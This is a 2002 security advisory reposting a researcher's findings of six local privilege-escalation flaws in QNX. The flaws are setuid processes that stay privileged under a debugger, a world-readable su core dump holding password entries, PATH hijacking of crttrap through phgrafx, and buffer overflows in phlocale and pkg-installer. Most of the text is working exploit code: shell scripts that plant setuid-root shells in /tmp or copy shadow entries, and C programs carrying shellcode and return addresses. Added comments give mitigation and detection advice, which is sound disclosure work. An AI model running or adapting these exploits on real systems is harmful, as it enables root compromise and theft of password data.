


QNX buffer overflows and other goodies...



4th Jun 2002 [SBWID-5394]
COMMAND

	QNX buffer overflows and other goodies...

SYSTEMS AFFECTED

	Current QNX distribution

PROBLEM

	badc0ded@badc0ded.com found many bugs in QNX:
	

	 Issue 0x0 Kernel

	 ================

	

	QNX allows local users to attach to any process. Not being familiar
	with the QNX API and terminology, I can only describe it as being able
	to attach to ANY process with ptrace(), regardless of your uid/euid.
	An example to clear things up :)
	

	

	$ cat tmp.c

	main ()

	{

	  printf(\"euid=%i\\n\",geteuid());

	}

	$ ls -l tmp

	-rwsr-xr-x  1 root      100            4021 May 20 13:31 tmp

	$ ./tmp

	euid=0

	So far everything is normal.

	$ gdb tmp

	GNU gdb 5.0

	Copyright 2000 Free Software Foundation, Inc.

	GDB is free software, covered by the GNU General Public License, and you are

	welcome to change it and/or distribute copies of it under certain conditions.

	Type \"show copying\" to see the conditions.

	There is absolutely no warranty for GDB.  Type \"show warranty\" for details.

	This GDB was configured as \"--host=x86-pc-nto-qnx --target=ntox86\"...

	(no debugging symbols found)...

	(gdb) r

	Starting program: /tmp/tmp

	(gdb) c

	Continuing.

	euid=0

	

	Program exited normally.

	(gdb)

	

	

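	Uh oh.. not quite the result you would expect: the setuid-root program
	kept euid=0 while running under a debugger started from an ordinary
	user's shell. A Unix kernel normally ignores the setuid bit when the
	process is being traced by an unprivileged user.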
	

	Exploit:
	

	#!/bin/sh

	

	#include <std_shouts.h>

	#include <std_disclaimer.h>

	#http://www.badc0ded.com 

	# Defender note: this listing depends entirely on the kernel issue described
	# above. A setuid-root binary (/bin/su) keeps its elevated euid while an
	# unprivileged user drives it through gdb, so the debugger commands written
	# to /tmp/badc0ded below act with root's rights.
	# Mitigation belongs in the kernel / process manager: either refuse debug
	# control of a process whose credentials differ from the caller's, or ignore
	# the setuid bit when the process is started under trace.
	# Detection: gdb started on a setuid binary by a non-root user, and
	# setuid-root copies of a shell appearing under /tmp (mode 4755 here).

	

	echo \"#!/bin/sh\" > /tmp/runme

	echo cp /bin/sh /tmp/sh > /tmp/runme

	echo chmod 4755 /tmp/sh >> /tmp/runme

	chmod 755 /tmp/runme

	echo r root -c /tmp/runme > /tmp/badc0ded

	echo break *main+44 >> /tmp/badc0ded

	echo c >> /tmp/badc0ded

	echo \"call setuid(0)\" >> /tmp/badc0ded

	echo c >> /tmp/badc0ded

	gdb /bin/su  < badc0ded > /dev/null

	echo \"www.badc0ded.com\"

	sleep 1

	rm /tmp/runme /tmp/badc0ded

	/tmp/sh

	

	

	

	 Issue 0x1 /bin/su

	 ==================

	

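	/bin/su can be sent SIGSEGV and then dumps a world-readable core file.
	The core holds whatever su had in memory, which (per the script below)
	includes password-file entries.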
	

	Exploit:
	

	#!/bin/sh

	#include <std_shouts.h>

	#include <std_disclaimer.h>

	# www.badc0ded.com <= we are in the .dot core, really :) 

	

	# If everything works you should get a \"copy\" of /etc/shadow 

	# in /tmp called mypasswd. 

	# Defender note: the weakness is in how the core file is produced, not in
	# the signal itself. su holds password-database contents in memory, and its
	# core is written to /var/dumps/su.core readable by every user.
	# Mitigation: do not write core files for setuid programs, or create them
	# owner-only, and make /var/dumps unreadable to ordinary users.
	# Detection: a su.core file appearing in /var/dumps, or su terminating on
	# SIGSEGV.

	 

	su > /dev/null &

	kill -SEGV `ps -A | grep su | awk {\'print $1\'}`

	strings /var/dumps/su.core | grep \":0:0\" > /tmp/mypasswd

	

	

	

	 Issue 0x2 phgrafx

	 ==================

	

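	phgrafx executes crttrap with system() without first dropping its euid.
	The script below also shows that crttrap is looked up through the
	caller's PATH, so a fix needs both an absolute path to crttrap and a
	privilege drop before the call.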
	

	Exploit:
	

	#!/bin/sh

	#

	# click advanced,done, apply, accept and done. 

	# now you should have a setuid root shell waiting in /tmp/badc0ded

	#

	# www.badc0ded.com

	# Defender note: two faults in phgrafx combine here. It still has euid 0
	# when it calls system(), and it names crttrap without a path, so the shell
	# started by system() resolves the name through the caller's PATH.
	# Mitigation in phgrafx: drop the elevated euid before spawning anything,
	# invoke /usr/bin/crttrap by absolute path through exec*() with a fixed
	# argv instead of system(), and reset PATH to a trusted value.
	# Interim measure: remove the setuid bit from phgrafx where it is not needed.
	# Detection: an executable named crttrap outside /usr/bin, and setuid-root
	# files appearing under /tmp.

	echo \"#!/bin/sh\" > /tmp/crttrap

	echo \"cp /bin/sh /tmp/badc0ded\" >> /tmp/crttrap

	echo \"chmod 4777 /tmp/badc0ded\" >> /tmp/crttrap

	echo \"/usr/bin/crttrap \\$1 \\$2 \\$3 \\$4 \\$5 \\$6 \\$7 \\$8 \\$9 \" >> /tmp/crttrap

	chmod 755 /tmp/crttrap

	export PATH=\"/tmp:$PATH\"

	/usr/photon/bin/phgrafx

	

	

	

	 Issue 0x3 phgrafx-startup

	 =========================

	

	Same problem as phgrafx (Issue 0x2): crttrap is run through system()
	while the elevated euid is still in effect.
	

	Exploit:
	

	#!/bin/sh

	#

	# click test,restore,continue  

	# now you should have a setuid root shell waiting in /tmp/badc0ded

	#

	# www.badc0ded.com

	# Defender note: the advisory gives the same root cause as for phgrafx.
	# phgrafx-startup runs crttrap through system() with its elevated euid
	# still in effect, and the name is resolved through the caller's PATH.
	# Mitigation in phgrafx-startup: drop privileges before spawning, call
	# /usr/bin/crttrap by absolute path through exec*() with a fixed argv, and
	# reset PATH to a trusted value.
	# Detection: an executable named crttrap outside /usr/bin, and setuid-root
	# files appearing under /tmp.

	echo \"#!/bin/sh\" > /tmp/crttrap

	echo \"cp /bin/sh /tmp/badc0ded\" >> /tmp/crttrap

	echo \"chmod 4777 /tmp/badc0ded\" >> /tmp/crttrap

	echo \"/usr/bin/crttrap \\$1 \\$2 \\$3 \\$4 \\$5 \\$6 \\$7 \\$8 \\$9 \" >> /tmp/crttrap

	chmod 755 /tmp/crttrap

	export PATH=\"/tmp:$PATH\"

	/usr/photon/bin/phgrafx-startup

	

	

	

	 Issue 0x4 phlocale

	 ==================

	

	Buffer overflows via the $ABLANG environment variable, and other goodies..
	

	Exploit:
	

	/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. 

	 * If it doesnt work for you, then you most likely need to change

	 * the address to system() and/or the ret.

	 * 

	 * www.badc0ded.com 

	*/

	/* Defender note: the listing places a 1000-byte value in the ABLANG
	 * environment variable and then executes /usr/photon/bin/phlocale. The
	 * advisory attributes the result to a buffer overflow in phlocale's
	 * handling of that variable; presumably the value is copied into a
	 * fixed-size buffer without a length check (phlocale's source is not shown
	 * here, so confirm against it).
	 * Mitigation: bound every copy of environment data in a privileged
	 * program, and drop the elevated euid before parsing the environment.
	 * Interim measure: remove the setuid bit from phlocale where it is not
	 * needed.
	 * Detection: phlocale started with an ABLANG value far longer than a
	 * locale name, or phlocale crashing.
	 */

	

	main ()

	{ 

	   char s[]=\"\\xeb\\x0e\\x31\\xc0\\x5b\"

	            \"\\x88\\x43\\x2\\x53\\xbb\"

	            \"\\x80\\x95\\x04\\x08\"       //system() address

	            \"\\xff\\xd3\\xe8\\xed\\xff\"

	            \"\\xff\\xff\\x73\\x68\";

	   char payload[1000];

	   memset (payload,0x90,sizeof(payload));

	   sprintf(payload+971,\"%s%s\",s,\"\\x78\\x7b\\x04\\x08\");

	   setenv(\"ABLANG\",payload);

	   execlp(\"/usr/photon/bin/phlocale\",\"phlocale\",0);

	}

	

	

	

	 Issue 0x5 pkg-installer.c

	 =========================

	

	Simple command-line buffer overflow in the argument to -u
	

	Exploit:
	

	/* Quick and dirty QNX pkg-installer root exploit.

	 * The shellcode sucks, it is longer than it has

	 * to be and you need the address to system() for 

	 * it to work. Yes I know I\'m lazy....

	 * 

	 * http://www.badc0ded.com 

	*/

	/* Defender note: the listing executes /usr/photon/bin/pkg-installer with
	 * an oversized string as the argument to -u. The advisory describes the
	 * flaw as a command-line buffer overflow in that argument; presumably the
	 * argument is copied into a fixed-size buffer without a length check
	 * (pkg-installer's source is not shown here, so confirm against it).
	 * Mitigation: validate the length of every argv string before copying it,
	 * and do not parse arguments while holding an elevated euid.
	 * Interim measure: remove the setuid bit from pkg-installer where it is
	 * not needed.
	 * Detection: pkg-installer started with a -u argument of more than a
	 * thousand bytes, or pkg-installer crashing.
	 */

	

	main(int argc, char **argv)

	{

	   int ret=0x804786d;

	   char *pret;

	   char s[]=\"\\xeb\\x0e\\x31\\xc0\\x5b\"

	            \"\\x88\\x43\\x2\\x53\\xbb\"

	            \"\\xe4\\xb4\\x04\\x08\"       //system() address

	            \"\\xff\\xd3\\xe8\\xed\\xff\"

		    \"\\xff\\xff\\x73\\x68\";

	   char payload[2000];

	   if (argc>=2)

	      ret=ret-atoi(argv[1]);

	   pret=&ret;

	   printf(\"using ret %x\\n\",ret);

	   memset(payload,0x90,1254);

	   sprintf(payload+1254,\"%s%s\",s,pret);

	   execlp(\"/usr/photon/bin/pkg-installer\",\"pkg-installer\",\"-u\",payload,0);

	

	}

	

SOLUTION

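	Nothing yet; no fix is listed as of this advisory (4th Jun 2002).
	Where local users are not trusted, the interim measures that follow
	from the issues above are removing the setuid bit from the affected
	Photon binaries where that is operationally acceptable and restricting
	read access to /var/dumps; neither addresses Issue 0x0.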

